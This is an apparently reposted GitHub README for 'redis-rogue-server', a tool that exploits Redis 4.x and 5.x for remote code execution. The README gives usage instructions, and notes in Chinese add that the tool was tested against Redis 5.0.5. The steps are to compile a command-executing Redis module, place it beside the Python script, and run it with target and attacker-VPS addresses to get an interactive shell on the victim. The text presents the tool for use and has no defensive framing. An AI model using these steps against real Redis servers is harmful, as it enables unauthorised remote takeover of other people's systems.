code-scan/redis-rogue-server: Redis 4.x/5.x RCE
2019-07-09 18:54:59 Author: github.com(查看原文) 阅读量:264 收藏

Join GitHub today

GitHub is home to over 36 million developers working together to host and review code, manage projects, and build software together.

Sign up

A exploit for Redis 4.x RCE, inspired by Redis post-exploitation.

经测试Redis 5.0.5也可以使用,没有出现ppt上写的5.0无法set/get config的情况.

Usage:

Compile .so from https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.

Copy the .so file to same folder with redis-rogue-server.py.

Run the rogue server:

python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port>

如果目标Redis服务开启了认证功能,可以通过--passwd指定密码

The default target port is 6379 and the default vps port is 21000.

And you will get an interactive shell!


文章来源: https://github.com/code-scan/redis-rogue-server
如有侵权请联系:admin#unsafe.sh